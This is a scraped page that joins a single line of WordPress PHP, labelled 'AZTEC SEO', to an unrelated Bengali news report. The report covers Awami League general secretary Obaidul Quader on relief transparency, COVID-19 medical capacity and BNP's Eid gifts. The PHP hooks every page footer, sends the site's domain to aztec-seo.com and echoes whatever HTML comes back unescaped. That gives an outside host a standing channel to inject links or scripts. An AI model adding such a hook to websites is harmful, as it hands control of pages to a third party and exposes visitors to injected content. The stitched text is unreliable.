/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ত্রাণ কার্যক্রমে স্বচ্ছতা নিশ্চিত করনে শেখ হাসিনা সরকার কঠোর অবস্থানে, যারা দলীয় পরিচয়ে অনিয়ম করবে তাদের স্বরণ করিয়ে দিয়ে আওয়ামী লীগের সাধারণ সম্পাদক ওবায়দুল কাদের বলেছেন,অনিয়ম দুর্নীতির বিরুদ্ধে শেখ হাসিনার সরকারের শুদ্ধি অভিযান এখনো চলমান। সোমবার (১১ মে) সকালে তার সরকারি বাসভবনে ব্রিফিংকালে এসব কথা বলেন তিনি ।
ওবায়দুল কাদের বলেন, করোনা চিকিৎসা বিস্তার রোধ করতে সরকার চিকিৎসা ক্ষেত্রেও সক্ষমতা বাড়িয়েছে। তিনি বলেন,সম্মুখ সারিতে তারুণ্যের শক্তি হিসেবে নতুন ডাক্তার ও নার্স যুক্ত হওয়ায় করোনা প্রতিরোধ লড়াইয়ে নতুন গতির সঞ্চার হয়েছে।
আওয়ামী লীগ সাধারণ সম্পাদক বলেন,দেশ যখন করোনার করাল গ্রাসে বিপর্যস্ত তখন জনগণের প্রত্যাশা ছিলো বিএনপি ত্রান সাহায্য নিয়ে অসহায় মানুষদের দাঁড়াবে কিন্তু তারা তা না করে তাদের নেতাকর্মীদের ঈদ উপহার কিনে দিচ্ছে, এই দুর্যোগে যা কোন ভাবেই প্রত্যাশা নয়।